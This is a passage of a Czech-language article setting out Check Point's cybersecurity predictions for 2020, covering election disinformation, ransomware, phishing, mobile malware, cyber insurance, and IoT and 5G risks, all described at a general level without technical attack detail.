Fake news 2.0 v amerických volbách v roce 2020 – V amerických volbách v roce 2016 jsme viděli počátek šíření fake news s využitím umělé inteligence. Byly sestavovány speciální týmy, které vytvářely a šířily falešné příběhy, aby snižovaly důvěryhodnost a podporu politických protivníků. Američtí kandidáti mohou očekávat, že už nyní pracují různé skupiny na plánech, jak ovlivnit příští volby v roce 2020.
Kyberútoky na průmyslová zařízení a kritické infrastruktury znovu strašákem – Průmyslová zařízení a kritické infrastruktury budou i nadále terčem kyberútoků, jak je patrné z letošních útoků na americké a jihoafrické společnosti. V mnoha případech kritická infrastruktura pro distribuci energií a vody používá starší technologie, které jsou zranitelné a je možné je vzdáleně zneužít, protože aktualizace mohou znamenat riziko výpadků a přerušení služby. Národy se budou muset zabývat zásadním posílením kybernetické obrany své infrastruktury.
Technická kyberbezpečnostní předpověď společnosti Check Point na rok 2020:
Růst cílených ransomwarových útoků – V roce 2019 se ransomware stále více zaměřoval na konkrétní společnosti, úřady a zdravotnické organizace. Útočníci pečlivě analyzují své oběti, aby měli jistotu, že mohou způsobit maximální škody a tím pádem se zvýší šance na platbu výkupného. Útoky jsou tak zákeřné, že i FBI zmírnila svůj postoj k platě výkupného: Nyní uznává, že v některých případech budou společnosti možná muset zvážit další možnosti, jak ochránit akcionáře, zaměstnance a zákazníky. Můžeme očekávat, že poroste počet organizací, které se pojistí proti ransomwarovým útokům, což ale také zvýší požadavky útočníků na výkupné.
Phishingové útoky nejen v e-mailech – I když e-mail zůstává číslem 1 pro šíření phishingových útoků, kyberzločinci používají celou řadu dalších útočných vektorů, aby z obětí vylákali osobní informace, přihlašovací údaje nebo peníze. Stále častěji se setkáváme s phishingovými SMS útoky a útoky na sociálních sítích a v herních platformách.
Nárůst útoků mobilního malwaru – V první polovině roku 2019 jsme viděli 50% nárůstu útoků mobilního bankovního malwaru v porovnání s rokem 2018. Bankovní malware může krást platební data, přihlašovací údaje a prostředky z bankovních účtů obětí. Nové verze může navíc využít k útokům kdokoli, stačí si je jen koupit od vývojářů malwaru. Phishingové útoky budou také sofistikovanější a efektivnější ve snaze nalákat ještě více mobilních uživatelů ke kliknutí na škodlivé webové odkazy.
Nárůst kybernetického pojištění – Poroste zájem o kybernetické pojištění pro organizace, školy, nemocnice nebo veřejné služby. Pojišťovací společnosti budou i nadále nabádat k platbě výkupného, protože je to obecně levnější než zotavení z ransomwarového útoku. To povede k dalším útokům a rychlému růstu kybernetického pojištění. Ale vyplacení pojistného není zaručeno: Právní bitva mezi potravinářským gigantem Mondelez a jeho pojišťovnou v Curychu stále probíhá. Nárok společnosti Mondelez na pojistné ve výši 100 milionů dolarů po útoku ransomwaru NotPetya v roce 2017 byl zatím odmítnut, protože pojišťovna tvrdí, že útok byl „nepřátelskou nebo válečnou akcí v době míru nebo války“.
Více IoT zařízení, více rizik - S postupným rozšiřováním 5G sítí se zásadně zvýší i používání připojených IoT zařízení a významně vzroste i zranitelnost sítí vůči rozsáhlým, multivektorovým kybernetickým útokům 5. generace. IoT zařízení a jejich připojení k sítím a cloudům je slabým článkem v zabezpečení. Bude potřeba komplexní přístup k zabezpečení internetu věcí, kombinující tradiční a nové technologie. Nová generace zabezpečení bude využívat nano agenty: Mikro-pluginy, které mohou pracovat s jakýmkoli zařízením nebo operačním systémem v jakémkoli prostředí, budou kontrolovat všechna data procházející zařízením a poskytnou nepřetržité zabezpečení.
5G dramaticky zvýší objemy dat - 5G přinese mimo jiné obrovský nárůst počtu připojených zařízení a senzorů. eHealth aplikace budou shromažďovat data o pacientech, služby související s chytrými auta budou sledovat pohyby uživatelů a chytrá města budou shromažďovat informace, jak uživatelé žijí svůj život. Tento neustále rostoucí objem osobních dat a údajů bude potřeba chránit proti krádežím a zneužití.
Umělá inteligence zrychlí bezpečnostní reakce… ale nezahálí ani kyberzločinci - Většina bezpečnostních řešení využívá detekční jádro postavené na lidské logice, ale udržet tento systém aktuální proti nejnovějším hrozbám a napříč novými technologiemi a zařízeními není možné ručně. Umělá inteligence zrychlí identifikaci nových hrozeb a reakci na ně a pomůže blokovat útoky dříve, než se mohou dále šířit. Ovšem i kyberzločinci začínají využívat stejné techniky, které jim pomohou prozkoumat sítě, najít zranitelná místa a vytvořit ještě maskovanější malware.